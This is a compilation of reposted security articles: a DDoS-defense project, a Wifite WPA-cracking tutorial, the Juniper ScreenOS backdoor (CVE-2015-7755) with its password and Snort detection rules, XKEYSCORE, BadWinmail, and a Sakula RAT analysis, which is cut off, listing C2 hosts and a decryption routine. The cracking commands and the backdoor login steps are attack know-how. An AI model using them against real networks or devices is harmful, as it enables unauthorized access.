Flexible DDoS Defense: Bohatei

Bohatei is a first of its kind platform that enables flexible and elastic DDoS defense using SDN and NFV

 The backend folder consists of :

  • an implementation of the FlowTags framework for the OpenDaylight controller
  • an implementation of the resource management algorithms
  • a topology file that was used to simulate an ISP topology
  • scripts that facilitate functions such as spawning, tearing down and retrieving the topology.
  • scripts that automate and coordinate the components required for the usecases examined.

White paper is available here.

The frontend folder contains the required files for the web interface.

For the experiments performed, team used a set of VM images that contain implementations of the strategy graphs for each type of attack (SYN Flood, UDP Flood, DNS Amplification and Elephant Flow). Those images will become available at a later stage. The tools that were used for those strategy graphs are the following:

  • Bro
  • Snort
  • Balancer
  • Iptables
  • Iperf
  • Custom scripts to simulate the attacks 

bohatei

You may download it here.

 

Original Post: http://www.hackinsight.org/news,533.html

How to Crack WPA/WPA2 with Wifite

Hi there again, aspiring hackers (and veterans as well)! I’m going to explain how to perform a dictionary attack on a WPA/WPA2 protected network with Wifite. Please note that this doesn’t work with WPA Enterprise For that end, you’d have to use an Evil Twin to get the “Enterprise” auth attempt, and then crack it.But don’t worry, Enterprise isn’t common in many corporations, and I still haven’t seen it on any home network. That being said, let’s get started.

Step 1: Get Ready Your Dictionary File

First, we’re gonna need a dictionary, to perform the dictionary attack. If the network you’re attacking has WPS enabled, you may attempt to get the password that way first.

In Kali, you have a nice wordlist that comes bundled within your installation/live usb. It’s located in /usr/share/wordlists, but it comes compressed in .gz format (at least in the live version).

To get it ready for the attack, we need to type:

gzip -d /usr/share/wordlists/rockyou.txt.gz

And within seconds it’ll be extracted and ready to use.

Backtrack has them located in /pentest/passwords/wordlists. It has one that’s called darkc0de.lst along with the rockyou.txt one.

You can use them simply copying one of this after the ‘-dict’ option.

/pentest/passwords/wordlists/rockyou.txt
/pentest/passwords/wordlists/darkc0de.lst

For any other distros, search for “download wordlist rockyou” or “download wordlist darkc0de”, or just “download wordlist” in DuckDuckGo. It gives more precise results than Google for this kind of stuff.

For the rest of this, I’ll assume that you’re using Kali.

Step 2: Launch Wifite

To launch Wifite, you must be running with root permissions.

In a live Kali boot, you are logged on by default with the root user. If you let it running for a while (while cracking with the dictionary, pressumably) and it asks for a password to return to the session, it’s ‘toor’ (root backwards).

Same for BackTrack (confirmation needed), and for other distros you can gain root access by typing “su” or “sudo su” and entering the password. The first command requires you to know root’s password, and the second your current account’s and it must have root privileges.

TL;DR? Okay, you just want the command? Here it is!

wifite -mac -aircrack -dict /usr/share/wordlists/rockyou.txt

-mac | Anonymizes your MAC Address by randomizing it (it mustn’t be set to monitor mode, or this command won’t work).

-aircrack | Tells Wifite we’ll be doing an Aircrack only attack.

-dict | Select a dictionary to use for cracking the password after capturing the handshake, otherwise you’ll get the ‘.cap’ file and Wifite will terminate.

I have it located in a different folder because I’m not running Kali, but it’s pretty much the same.

Step 3: Select Your Wireless Adapter and Your Target

If you have a laptop, you’ll probably have to choose which adapter to use, if you have an external USB adapter. Please note that you’ll need acompatible adapter that’s able to inject packets and enter into promiscuous mode (monitor mode), or this won’t work.

If prompted, we select our adapter choosing the number Wifite has assigned it. In my case, I’ll type ‘1’, because that’s mine. One good indicator for knowing which one it is, is reading that name to the left of phy. For example, I have one that says ‘usb’ in it, and one that doesn’t. And yep, I have it plugged to USB, so that one’s it.

Now we’ll see a list of wireless networks, and if we let it run, it will eventually display ‘client’ or ‘clients’ at the top right of the network info, showing that it has a client (or more) connected to it.

To stop the scan, press Ctrl+C. I’ll choose “Casa” (spanish for House).

Step 4: Sit and Wait

If the network you’re attempting to crack has WPS enabled, it’ll start cracking it like that first. To stop it, just press Ctrl+C

Now it will attempt to capture the handshake for a few minutes.

If no clients are connected, it’ll send a general deauth to the wireless adapter, so that clients may show up.

If it detects a client connected to the network, it’ll tell you it’s MAC Address, and proceed to send targeted deauths to that client.

When it succeeds deauthenticating a client (who has re-connect enabled by default), or a new client connects to the network, hopefully it will capture the handshake, and it’ll start attempting to crack it with aircrack-ng and the dictionary file you gave it.

If the passphrase is any of the words contained in that dictionary, it’ll stop and show it on screen. Otherwise, it’ll run through the whole dictionary, and say it couldn’t find the key. But it has a nice success rate.

I used my country in lowercase letters as the passphrase (argentina), and as it’s along the first words in this dictionary, it took only one second to crack it. For you it may take over an hour or two, depending on your processing power and if the passphrase is near the beginning or the end of the list.

Wifite Succeded but Failed!

If it failed, you still get the ‘.cap’ file (hopefully not empty).

You can use that file with the same dictionary (or others) with aircrack-ng, using this command:

aircrack-ng -w <location of dictionary> <location of your .cap file>

In Kali live, ‘.cap’ files get saved into a folder named ‘hs’ of the folder you’re standing.

After Wifite has ended, type:

ls ./hs

To see you ‘.cap’ files and other files for cracking.

Some More Words

Well, that’s pretty much it. I hope you may find it helpful, but remember to look at OTW guides on Wireless cracking to know exactly what this script is doing, so you may tweak it furthermore or play with its options for more effectivity (type ‘wifite –help’ to see it’s options).

Should I write a guide on how to install this script on a non-kali machine? It’s pretty illuminating about which programs it uses for which purpose…

Original Post: http://null-byte.wonderhowto.com/how-to/crack-wpa-wpa2-with-wifite-0161976/

Who planted the Juniper ScreenOS Authentication Backdoor?

Who planted the Authentication Backdoor in the Juniper ScreenOS? Security experts are making their speculation, but interesting revelations are coming out.

While the FBI is investigating the case searching for responsible for the introduction of a backdoor in a number of Juniper network devices, a number of speculation are circulating on the Internet.  Juniper Networks is a technology provider for the US Government and many US federal agencies, including the FBI, this means that attackers may have had access to the traffic related to connections protected through VPNs.

Someone is blaming China, other the NSA, and the majority is pointing a more generic nation-state actor.

The experts that blame the Chinese Government sustain that the compromised appliance was originally developed by the NetScreen Technologies company that was acquired by Juniper Networks in 2004.  The NetScreen Technologies was founded by Chinese nationals, for this reason some experts believe that Chinese experts have a deep knowledge of the compromised ScreenOS.

“It’s not hard to find evidence of ongoing work on ScreenOS in Beijing: a quick trawl of LinkedIn turns up several Juniper employees who work on the operating system. The Register in no way suggests that those who work in Juniper’s Beijing offices are in any way associated with the unauthorised code. We nonetheless asked Juniper if the code is known to have come from the Beijing facility.” states a blog post published by The Register.

Many experts speculate the involvement of the NSA, one of the documents leaked by Edward Snowden and disclosed by the German Der Spiegel revealed that the US intelligence had the ability to plant a backdoor in various network equipment, including Juniper firewalls.

NSA Juniper implant

There is also speculation that the two backdoors might not be the work of the same state-actor, as they are not connected.

According to the German online magazine, hackers belonging to the ANT division (Advanced or Access Network Technology), operating under the NSA’s department for Tailored Access Operations (TAO), 

“In the case of Juniper, the name of this particular digital lock pick is “FEEDTROUGH.” This malware burrows into Juniper firewalls and makes it possible to smuggle other NSA programs into mainframe computers. Thanks to FEEDTROUGH, these implants can, by design, even survive “across reboots and software upgrades.” In this way, US government spies can secure themselves a permanent presence in computer networks. The catalog states that FEEDTROUGH “has been deployed on many target platforms.” states the Der Spiegel online.

HD Moore, the developer of the Rapid7′ Metasploit Framework, confirmed that there are roughly 26,000 Netscreen devices exposed on the Internet with SSH open.

“Shortly after Juniper posted the advisory, an employee of Fox-IT stated that they were able to identify the backdoor password in six hours. A quick Shodan search identified approximately 26,000 internet-facing Netscreen devices with SSH open. Given the severity of this issue, we decided to investigate.” he wrote in a blog post.

HD Moore added that the backdoor might date back to late 2013, and the encryption backdoor to 2012.

“This is interesting because although the first affected version was released in 2012, the authentication backdoor did not seem to get added until a release in late 2013 (either 6.3.0r15, 6.3.0r16, or 6.3.0r17).”

Ronald Prins, founder and CTO of Fox-IT, a Dutch security firm, explained that reverse engineering the patch released by Juniper he was able to discover the master password backdoor (“<<< %s(un=’%s’) = %u,“).

“Once you know there is a backdoor there, … the patch [Juniper released] gives away where to look for [the backdoor] … which you can use to log into every [Juniper] device using the Screen OS software,” he told WIRED. “We are now capable of logging into all vulnerable firewalls in the same way as the actors [who installed the backdoor].”  explained Prins.

Fox-IT has also released the Snort rules that can be used by the sys admins to detect unauthorized access to the Juniper devices through the backdoor.

“Since our initial announcement we’ve learned that the number of versions of ScreenO affected by each of the issues is more limited than originally believed. Administrative Access (CVE-2015-7755) only affects ScreenOS 6.3.0r17 through 6.3.0r20. VPN Decryption (CVE-2015-7756) only affects ScreenOS 6.2.0r15 through 6.2.0r18 and 6.3.0r12 through 6.3.0r20,” reported Juniper shared inviting administrators to apply the security updates as soon as possible.

The unique certainly is that  someone deliberately inserted a backdoor password into Juniper network devices.

Original post: http://securityaffairs.co/wordpress/42971/hacking/juniper-screenos-authentication-backdoor.html

CVE-2015-7755: Juniper ScreenOS Authentication Backdoor

On December 18th, 2015 Juniper issued an advisory indicating that they had discovered unauthorized code in the ScreenOS software that powers their Netscreen firewalls. This advisory covered two distinct issues; a backdoor in the VPN implementation that allows a passive eavesdropper to decrypt traffic and a second backdoor that allows an attacker to bypass authentication in the SSH and Telnet daemons. Shortly after Juniper posted the advisory, an employee of Fox-IT stated that they were able to identify the backdoor password in six hours. A quick Shodan searchidentified approximately 26,000 internet-facing Netscreen devices with SSH open. Given the severity of this issue, we decided to investigate.

 

Juniper’s advisory mentioned that versions 6.2.0r15 to 6.2.0r18 and 6.3.0r12 to 6.3.0r20 were affected. Juniper provided a new 6.2.0 and 6.3.0 build, but also rebuilt older packages that omit the backdoor code. The rebuilt older packages have the “b” suffix to the version and have a minimal set of changes, making them the best candidate for analysis. In order to analyze the firmware, it must be unpacked and then decompressed. The firmware is distributed as a ZIP file that contains a single binary. This binary is a decompression stub followed by a gzip-compressed kernel. The x86 images can be extracted easily with binwalk, but the XScale images require a bit more work. ScreenOS is not based on Linux or BSD, but runs as a single monolithic kernel. The SSG500 firmware uses the x86 architecture, while the SSG5 and SSG20 firmware uses the XScale (ARMB) architecture. The decompressed kernel can be loaded into IDA Pro for analysis. As part of the analysis effort, we have made decompressed binaries available in a GitHub repository.

 

Although most folks are more familiar with x86 than ARM, the ARM binaries are significantly easier to compare due to minimal changes in the compiler output. In order to load the SSG5 (ssg5ssg20.6.3.0r19.0.bin) firmware into IDA, the ARMB CPU should be selected, with a load address of 0x80000 and a file offset of 0x20. Once the binary is loaded, it helps to identify and tag common functions. Searching for the text “strcmp” finds a static string that is referenced in the sub_ED7D94 function. Looking at the strings output, we can see some interesting string references, including auth_admin_ssh_special and auth_admin_internal. Searching for “auth_admin_internal” finds the sub_13DBEC function. This function has a “strcmp” call that is not present in the 6.3.0r19b firmware:

 

ssh.png

 

The argument to the strcmp call is <<< %s(un=’%s’) = %u, which is the backdoor password, and was presumably chosen so that it would be mistaken for one of the many other debug format strings in the code. This password allows an attacker to bypass authentication through SSH and Telnet. If you want to test this issue by hand, telnet or ssh to a Netscreen device, specify any username, and the backdoor password. If the device is vulnerable, you should receive an interactive shell with the highest privileges.

 

The interesting thing about this backdoor is not the simplicity, but the timing. Juniper’s advisory claimed that versions 6.2.0r15 to 6.2.0r18 and 6.3.0r12 to 6.3.0r20 were affected, but the authentication backdoor is not actually present in older versions of ScreenOS. We were unable to identify this backdoor in versions 6.2.0r15, 6.2.0r16, 6.2.0r18 and it is probably safe to say that the entire 6.2.0 series was not affected by this issue (although the VPN issue was present). We were also unable to identify the authentication backdoor in versions 6.3.0r12 or 6.3.0r14. We could confirm that versions 6.3.0r17 and 6.3.0r19 were affected, but were not able to track down 6.3.0r15 or 6.3.0r16. This is interesting because although the first affected version was released in 2012, the authentication backdoor did not seem to get added until a release in late 2013 (either 6.3.0r15, 6.3.0r16, or 6.3.0r17).

 

Detecting the exploitation of this issue is non-trivial, but there are a couple things you can do. Juniper provided guidance on what the logs from a successful intrusion would look like:

 

2015-12-17 09:00:00 system warn 00515 Admin user system has logged on via SSH from …..

2015-12-17 09:00:00 system warn 00528 SSH: Password authentication successful for admin user ‘username2’ at host …

 

Although an attacker could delete the logs once they gain access, any logs sent to a centralized logging server (or SIEM) would be captured, and could be used to trigger an alert.

 

Fox-IT has a created a set of Snort rules that can detect access with the backdoor password over Telnet and fire on any connection to a ScreenOS Telnet or SSH service:

 

# Signatures to detect successful abuse of the Juniper backdoor password over telnet.
# Additionally a signature for detecting world reachable ScreenOS devices over SSH. 

alert tcp $HOME_NET 23 -> any any (msg:"FOX-SRT - Flowbit - Juniper ScreenOS telnet (noalert)"; flow:established,to_client; content:"Remote Management Console|0d0a|"; offset:0; depth:27; flowbits:set,fox.juniper.screenos; flowbits:noalert; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; classtype:policy-violation; sid:21001729; rev:2;)

alert tcp any any -> $HOME_NET 23 (msg:"FOX-SRT - Backdoor - Juniper ScreenOS telnet backdoor password attempt"; flow:established,to_server; flowbits:isset,fox.juniper.screenos; flowbits:set,fox.juniper.screenos.password; content:"|3c3c3c20257328756e3d2725732729203d202575|"; offset:0; fast_pattern; classtype:attempted-admin; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; sid:21001730; rev:2;)

alert tcp $HOME_NET 23 -> any any (msg:"FOX-SRT - Backdoor - Juniper ScreenOS successful logon"; flow:established,to_client; flowbits:isset,fox.juniper.screenos.password; content:"-> "; isdataat:!1,relative; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; classtype:successful-admin; sid:21001731; rev:1;)

alert tcp $HOME_NET 22 -> $EXTERNAL_NET any (msg:"FOX-SRT - Policy - Juniper ScreenOS SSH world reachable"; flow:to_client,established; content:"SSH-2.0-NetScreen"; offset:0; depth:17; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; classtype:policy-violation; priority:1; sid:21001728; rev:1;)

 

 

Robert Nunley has created a set of Sagan rules for this issue:

 

If you are trying to update a ScreenOS system and are running into issues with the signing key, take a look at Steve Puluka’s blog post.

 

We would like to thank Ralf-Philipp Weinmann of Comsecuris for his help with unpacking and analyzing the firmware and Maarten Boone of Fox-IT for confirming our findings and providing the Snort rules above.

 

Update: Fox-IT reached out and confirmed that *any* username can be used via Telnet or SSH with the backdoor password, regardless of whether it is valid or not.

Update: Juniper has confirmed that the authentication backdoor only applies to revisions 6.3.0r17, 6.3.0r18, 6.3.0r19, and 6.3.0r20

Update: Details on CVE-2015-7756 have emerged. The Wired article provides a great overview as well.

 

Original Post: https://community.rapid7.com/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor

BEHIND THE CURTAIN A Look at the Inner Workings of NSA’s XKEYSCORE

Second in a series. Part 1 here.

The sheer quantity of communications that XKEYSCORE processes, filters and queries is stunning. Around the world, when a person gets online to do anything — write an email, post to a social network, browse the web or play a video game — there’s a decent chance that the Internet traffic her device sends and receives is getting collected and processed by one of XKEYSCORE’s hundreds of servers scattered across the globe.

In order to make sense of such a massive and steady flow of information, analysts working for the National Security Agency, as well as partner spy agencies, have written thousands of snippets of code to detect different types of traffic and extract useful information from each type, according to documents dating up to 2013. For example, the system automatically detects if a given piece of traffic is an email. If it is, the system tags if it’s from Yahoo or Gmail, if it contains an airline itinerary, if it’s encrypted with PGP, or if the sender’s language is set to Arabic, along with myriad other details.

This global Internet surveillance network is powered by a somewhat clunky piece of software running on clusters of Linux servers. Analysts access XKEYSCORE’s web interface to search its wealth of private information, similar to how ordinary people can search Google for public information.

Based on documents provided by NSA whistleblower Edward Snowden, The Intercept is shedding light on the inner workings of XKEYSCORE, one of the most extensive programs of mass surveillance in human history.

How XKEYSCORE works under the hood

It is tempting to assume that expensive, proprietary operating systems and software must power XKEYSCORE, but it actually relies on an entirely open source stack. In fact, according to an analysis of an XKEYSCORE manual for new systems administrators from the end of 2012, the system may have design deficiencies that could leave it vulnerable to attack by an intelligence agency insider.

XKEYSCORE is a piece of Linux software that is typically deployed on Red Hat servers. It uses the Apache web server and stores collected data in MySQL databases. File systems in a cluster are handled by the NFS distributed file system and the autofs service, and scheduled tasks are handled by the cron scheduling service. Systems administrators who maintain XKEYSCORE servers use SSH to connect to them, and they use tools such as rsync and vim, as well as a comprehensive command-line tool, to manage the software.

John Adams, former security lead and senior operations engineer for Twitter, says that one of the most interesting things about XKEYSCORE’s architecture is “that they were able to achieve so much success with such a poorly designed system. Data ingest, day-to-day operations, and searching is all poorly designed. There are many open source offerings that would function far better than this design with very little work. Their operations team must be extremely unhappy.”

Analysts connect to XKEYSCORE over HTTPS using standard web browsers such as Firefox. Internet Explorer is not supported. Analysts can log into the system with either a user ID and password or by using public key authentication.

As of 2009, XKEYSCORE servers were located at more than 100 field sites all over the world. Each field site consists of a cluster of servers; the exact number differs depending on how much information is being collected at that site. Sites with relatively low traffic can get by with fewer servers, but sites that spy on larger amounts of traffic require more servers to filter and parse it all. XKEYSCORE has been engineered to scale in both processing power and storage by adding more servers to a cluster. According to a 2009 document, some field sites receive over 20 terrabytes of data per day. This is the equivalent of 5.7 million songs, or over 13 thousand full-length films.

This map from a 2009 top-secret presentation does not show all of XKEYSCORE’s field sites.

When data is collected at an XKEYSCORE field site, it is processed locally and ultimately stored in MySQL databases at that site. XKEYSCORE supports a federated query system, which means that an analyst can conduct a single query from the central XKEYSCORE website, and it will communicate over the Internet to all of the field sites, running the query everywhere at once.

There might be security issues with the XKEYSCORE system itself as well. As hard as software developers may try, it’s nearly impossible to write bug-free source code. To compensate for this, developers often rely on multiple layers of security; if attackers can get through one layer, they may still be thwarted by other layers. XKEYSCORE appears to do a bad job of this.

When systems administrators log into XKEYSCORE servers to configure them, they appear to use a shared account, under the name “oper.” Adams notes, “That means that changes made by an administrator cannot be logged.” If one administrator does something malicious on an XKEYSCORE server using the “oper” user, it’s possible that the digital trail of what was done wouldn’t lead back to the administrator, since multiple operators use the account.

There appears to be another way an ill-intentioned systems administrator may be able to cover their tracks. Analysts wishing to query XKEYSCORE sign in via a web browser, and their searches are logged. This creates an audit trail, on which the system relies to assure that users aren’t doing overly broad searches that would pull up U.S. citizens’ web traffic. Systems administrators, however, are able to run MySQL queries. The documents indicate that administrators have the ability to directly query the MySQL databases, where the collected data is stored, apparently bypassing the audit trail.

AppIDs, fingerprints and microplugins

Collecting massive amounts of raw data is not very useful unless it is collated and organized in a way that can be searched. To deal with this problem, XKEYSCORE extracts and tags metadata and content from the raw data so that analysts can easily search it.

This is done by using dictionaries of rules called appIDs, fingerprints and microplugins that are written in a custom programming language called GENESIS. Each of these can be identified by a unique name that resembles a directory tree, such as “mail/webmail/gmail,” “chat/yahoo,” or “botnet/blackenergybot/command/flood.”

One document detailing XKEYSCORE appIDs and fingerprints lists several revealing examples. Windows Update requests appear to fall under the “update_service/windows” appID, and normal web requests fall under the “http/get” appID. XKEYSCORE can automatically detect Airblue travel itineraries with the “travel/airblue” fingerprint, and iPhone web browser traffic with the “browser/cellphone/iphone” fingerprint.

PGP-encrypted messages are detected with the “encryption/pgp/message” fingerprint, and messages encrypted with Mojahedeen Secrets 2 (a type of encryption popular among supporters of al Qaeda) are detected with the “encryption/mojaheden2” fingerprint.

When new traffic flows into an XKEYSCORE cluster, the system tests the intercepted data against each of these rules and stores whether the traffic matches the pattern. A slideshow presentation from 2010 says that XKEYSCORE contains almost 10,000 appIDs and fingerprints.

AppIDs are used to identify the protocol of traffic being intercepted, while fingerprints detect a specific type of content. Each intercepted stream of traffic gets assigned up to one appID and any number of fingerprints. You can think of appIDs as categories and fingerprints as tags.

If multiple appIDs match a single stream of traffic, the appID with the lowest “level” is selected (appIDs with lower levels are more specific than appIDs with higher levels). For example, when XKEYSCORE is assessing a file attachment from Yahoo mail, all of the appIDs in the following slide will apply, however only “mail/webmail/yahoo/attachment” will be associated with this stream of traffic.

To tie it all together, when an Arabic speaker logs into a Yahoo email address, XKEYSCORE will store “mail/yahoo/login” as the associated appID. This stream of traffic will match the “mail/arabic” fingerprint (denoting language settings), as well as the “mail/yahoo/ymbm” fingerprint (which detects Yahoo browser cookies).

Sometimes the GENESIS programming language, which largely relies on Boolean logic, regular expressions and a set of simple functions, isn’t powerful enough to do the complex pattern-matching required to detect certain types of traffic. In these cases, as one slide puts it, “Power users can drop in to C++ to express themselves.” AppIDs or fingerprints that are written in C++ are called microplugins.

Here’s an example of a microplugin fingerprint for “botnet/conficker_p2p_udp_data,” which is tricky botnet traffic that can’t be identified without complicated logic. A botnet is a collection of hacked computers, sometimes millions of them, that are controlled from a single point.

Here’s another microplugin that uses C++ to inspect intercepted Facebook chat messages and pull out details like the associated email address and body of the chat message.

One document from 2009 describes in detail four generations of appIDs and fingerprints, which begin with only the ability to scan intercepted traffic for keywords, and end with the ability to write complex microplugins that can be deployed to field sites around the world in hours.

If XKEYSCORE development has continued at a similar pace over the last six years, it’s likely considerably more powerful today.

Illustration for The Intercept by Blue Delliquanti

Documents published with this article:

Original Post: https://theintercept.com/2015/07/02/look-under-hood-xkeyscore/

New Bug Lets Attacker Takeover PC via Outlook Email

New Bug Lets Attacker Takeover PC via Outlook EmailImage Source: Techno Stream

New Bug Lets Attacker Takeover PC via Outlook Email

This bug was discovered by a security researcher “Haifei Li” and named it BadWinmail. His technical report suggested the vulnerability was very easy to exploit and doesn’t require much interaction with the outlook’s user.

The user is only required to view the mail that contains malicious Flash file, once viewed by the user, the attacker is through.

Flash- the main culprit!

The main problem is with Flash which already has several known issues and is supported via Object Linking and Embedding (OLE) which allows any type of embedding inside office documents so with Flash vulnerable and a flaw in outlook’s sandboxing system this had to happen.

Once a user opens the malicious email OLE mechanism loads up the Flash file inside the email for user’s preview, here security sandboxing system vulnerability is exploited and the user gets infected by the malicious Flash file attached in the mail; the is not required to download it.

It gets worse

What’s worse about this Badwinmail attack is that it allows attackers to install more malicious material on the user’s system. According to the researcher:

“IT’S ALSO A WORMABLE ISSUE RARELY SEEN ON WINDOWS PLATFORM NOWADAYS.”

This type of attack is popular in APT groups or cyber-espionage agencies that are focused on smaller, individual targets. So, for all the Outlook users it is important to install the security patch Microsoft sent out on 9th of December to keep their systems secure.

Below is a video demonstration of the attack:

Original Post: https://www.hackread.com/bug-lets-attacker-takeover-pc-via-outlook-email/

 

Malware Sakula – Evolutions v2.x-3.x (Part 2)

This post is the second part of article on the Sakula malware. It follows the first one available here and covers versions 2.x and 3.x.

It provides a lot of technical details to follow Sakula evolution. Some parts of the article can be a bit long to read, but the fact to put constants, pathes, algorithms or others indicators in it is useful for reversers when they google some artefacts.

Once again, for those who are not necessarily interested by the technical stuff, you can directly access the Yara3 rules which identify all known versions 2.x and 3.x of Sakula here.

Type Version Seen Target’s activity *
RAT Sakula 2.0 11/07/2013
RAT Sakula 2.1 16/07/2013 Aerospace
RAT Sakula 2.2 24/09/2013
RAT Sakula 3.0a 07/01/2014
RAT Sakula 3.0b 27/02/2014
RAT Sakula 3.1a 16/05/2014
RAT Sakula 3.1b 09/07/2014 Healthcare
RAT Sakula 3.1c 10/07/2014 Healthcare
RAT Sakula 3.1d 18/09/2014 Government
RAT Sakula 3.2 09/01/2015

* Targets activity is only suspected from campaign ID found in binaries, and even if some of them are quite explicit, we cannot take them as direct evidences.

Version 2.0 to 2.2

Versions 2.x bring some minor features but implement essentially some protection mechanisms through the use of droppers, packers, stolen certificates and DLL Hijacking vulnerability.

After analysis, it appears that versions v2 and v3 evolved from the v1 (i.e. v3 doesn’t follow v2), as v2 updates are not present in v3.

v2.0 (11/07/2013)

The RAT has multiple layers of protection:

  • it is packed by UPX
  • it is embedded in a custom shellcode PE loader
  • it is embedded in a dropper

blackvinev2_0_arch2.png

The dropper is a simple executable which:

  • Extract the payload which is located after the last section of the binary file
  • Decrypt it using a single-byte XOR-encryption (key=0x33)
  • Execute it by making a JMP on it

The custom PE loader is designed as a shellcode which:

  • loads its needed imports from a custom GetProcAddress routine
    • get the PEB (Process Environment Block) structure’s address (from FS[30])
    • get the LDR (PEB_LDR_DATA) structure’s address (from the PEB)
    • get each LDR_DATA_TABLE_ENTRY structure from the field LDR.InLoadOrderModuleList (list of loaded module)
    • look for each LDR_DATA_TABLE_ENTRY.BaseDllName and search for a module with a specific name checksum
    • get the module’s LDR_DATA_TABLE_ENTRY.DllBase which is the base address of the module
    • get the DOS_HEADER.lfa_new field (baseaddress+0x3C) which contains the PE header offset
    • get the IMAGE_DIRECTORY_ENTRY_EXPORT struture’s address (peheader+0x78)
    • get the AddressOfNames field (dd_export+0x20) (list of strings)
    • look for each procedure’s name and search for the index of the procedure with a specific name checksum
    • use the AddressOfNameOrdinals field (dd_export+0x24) to get the offset of the procedure from the found index
  • extracts its payload (the original PE file) located at the end of the shellcode
  • loads the PE payload in memory

The packer UPX is used on the previous payload, probably to reduce its size and obfuscate it.

Since its version 1.4, Sakula core has undergone some updates.

It is signed with a stolen certificate:

  • Certificate issued to NexG by VeriSign Class 3 Code Signing 2010 CA

sakula_2_0_cert.png

It uses a new algorithm to decrypt its embedded exploits:

def decrypt_plugx(self, data, key):
    v1 = v2 = v3 = v4 = key
    decrypted = ""
    for c in data:
        v1 = (v1 + (v1 >> 3) - 0x1ACDF531) & 0xFFFFFFFF
        v2 = (v2 + (v2 >> 5) - 0x2CAFDCF2) & 0xFFFFFFFF
        v3 = (v3 + 0x34712393 - (v3 << 7)) & 0xFFFFFFFF
        v4 = (v4 + 0x46ADC7A4 - (v4 << 9)) & 0xFFFFFFFF

        xkey = (v1 + v2 + v3 + v4) & 0xFF

        decrypted += chr(ord(c) ^ xkey)

    return decrypted

This algorithm is not custom, as it was already seen in a PlugX sample (19d340cdc82d72705d0add94c8a43b0afe7e4f8cabc7c0f9abbb79cc55fc3c0d), dated 07/06/2013, with a different key (0xDF1D89DE). The key used in this version is 0x128933DF.

Before dropping its exploit to bypass UAC, it creates an event named Sakula and exits only if the exploit notifies its success via the event in the next 60 seconds.

When executed, the malware moves 3 files to a new location: itself, ./log.bin and ./OLEPRO32.DLL. At this moment, we don’t have these 2 last files, so their usefulness cannot be determined.

The method used to delete itself has been updated. It now gets the cmd path through %COMPSPEC% and executes it with the command /c del [FILENAME] > nul.

The configuration structure is:

struct ConfigV2_0
{
    CHAR    cc_domain[50];              //  115.47.35.117
    CHAR    uri_get1_folder[50];        //  /photo/
    CHAR    uri_get3_file[50];          //  script.asp
    CHAR    uri_get2_file[50];          //  /script.asp
    CHAR    uri_get3_arg[50];           //  imageid
    CHAR    copy_file_name[50];         //  MediaCenter.exe
    CHAR    autorun_key[50];            //  MicroMedia
    CHAR    copy_file_path[50];         //  %Temp%\MicroMedia
    CHAR    campaign_id[12];            //  [REMOVED]
    DWORD   waiting_time;               //  0x7530 (30000 milliseconds)
}

An example of used URIs:

  • POST /script.asp?imageid=[HASH_MACHINE_NAME]&type=[CMD_ID]&resid=[CMD_SEQ_NUM]&nmsg=up
  • GET (1) /photo/[HASH_MACHINE_NAME].jpg?resid=[CMD_SEQ_NUM]
  • GET (2) /script.asp?resid=[CMD_SEQ_NUM]&nmsg=del&photoid=[HASH_MACHINE_NAME]

v2.1 (16/07/2013)

All updates made in this version have been designed only for a unique use, and are not reused in other versions.

The dropper and the custom PE loader have been merged and UPX is not used anymore.

blackvinev2_1_arch.png

The code of the PE loader has been inserted into the dropper code. Consequently, we can suppose that the authors are the same.

There is a minor update on the old dropper code. Before decrypting its payload with the key 0x33, it decrypts 0x1000000 times its data with the key 0x32. This action is cryptographically useless (as two xor cancel themselves), but is equivalent to a Sleep.

This version is signed with stolen certificates:

  • Certificate issued to MICRO DIGITAL INC. by VeriSign Class 3 Code Signing 2010 CA

sakula_2_1_1_cert.png

Sakula drops an ActiveX file named ./MicroSoftSecurityLogin.ocx (only in this version). It has no interaction with the RAT and is almost empty. Its usefulness cannot be determined. However, Sakula extracts it from its resource from the type DLL and the name 0x45A. It is encrypted like embedded exploits with the PlugX algorithm. Attackers have the possibility to pop up a MessageBox containing the message fail to install activex.\n maybe you should reinstall it, independantly of the true result of the installation. This feature is not used in this version.

Sakula modifies the file \\drivers\\etc\\hosts by adding some hosts (only in this version):

csg.secure.[VICTIM DOMAIN]         217.108.[REMOVED]
ctx.secure.[VICTIM DOMAIN]         217.108.[REMOVED]
fdm.secure.[VICTIM DOMAIN]         217.108.[REMOVED]
qa.fdm.secure.[VICTIM DOMAIN]      217.108.[REMOVED]
qa.indigo.secure.[VICTIM DOMAIN]   217.108.[REMOVED]
pi.secure.[VICTIM DOMAIN]          217.108.[REMOVED]
qa.secure.[VICTIM DOMAIN]          217.108.[REMOVED]
qasd.secure.[VICTIM DOMAIN]        217.108.[REMOVED]
sd.secure.[VICTIM DOMAIN]          217.108.[REMOVED]
int.tcua.secure.[VICTIM DOMAIN]    217.108.[REMOVED]
qa.tcua.secure.[VICTIM DOMAIN]     217.108.[REMOVED]
secure.[VICTIM DOMAIN]             217.108.[REMOVED]

It uses the same configuration structure than the v2.0, but with different data:

struct ConfigV2_1
{
    CHAR    cc_domain[50];              //  login.qzbwcq.com
    CHAR    uri_get1_folder[50];        //  /photo/
    CHAR    uri_get3_file[50];          //  script.asp
    CHAR    uri_get2_file[50];          //  /script.asp
    CHAR    uri_get3_arg[50];           //  imageid
    CHAR    copy_file_name[50];         //  MediaCenter.exe
    CHAR    autorun_key[50];            //  MicroMedia
    CHAR    copy_file_path[50];         //  %Temp%\MicroMedia
    CHAR    campaign_id[12];            //  [REMOVED]
    DWORD   waiting_time;               //  0x7530 (30000 milliseconds)
}

struct ConfigV2_1
{
    CHAR    cc_domain[50];              //  oa.ameteksen.com:80
                                        //  oa.ameteksen.com:443
    CHAR    uri_get1_folder[50];        //  /photo/
    CHAR    uri_get3_file[50];          //  script.asp
    CHAR    uri_get2_file[50];          //  /script.asp
    CHAR    uri_get3_arg[50];           //  imageid
    CHAR    copy_file_name[50];         //  MediaCenter.exe
    CHAR    autorun_key[50];            //  MicroMedia
    CHAR    copy_file_path[50];         //  %Temp%\MicroMedia
    CHAR    campaign_id[12];            //  [REMOVED]
    DWORD   waiting_time;               //  0x7530 (30000 milliseconds)
}

struct ConfigV2_1
{
    CHAR    cc_domain[50];              //  sinmoung.com
                                        //  secure.devpia.com
                                        //  secure.devpia.com:443
    CHAR    uri_get1_folder[50];        //  /photo/
